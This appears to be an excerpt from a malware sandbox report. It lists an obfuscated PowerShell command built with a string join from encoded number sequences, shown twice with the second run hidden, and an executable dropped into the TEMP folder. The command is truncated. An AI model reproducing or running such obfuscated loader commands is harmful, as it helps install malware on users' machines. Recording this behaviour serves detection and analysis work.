Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [striNG]::JOIn('', ( '11o95-73S105o102,105-15p18l15o65l74,88o2p64S77T69g74,76-91-15S93S78I65o75{64g66{20l11-107g118p108-73S70T15,18T15T65g74{88l2{64S77g69g74T76I91-15l124,86o92,91-74-66I1o97I74...
- %TEMP%\515547.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [striNG]::JOIn('', ( '11o95-73S105o102,105-15p18l15o65l74,88o2p64S77T69g74,76-91-15S93S78I65o75{64g66{20l11-107g118p108-73S70T15,18T15T65g74{88l2{64S77g69g74T76I91-15l124,86o92,91-74-66I1o97I74...' (with hidden window)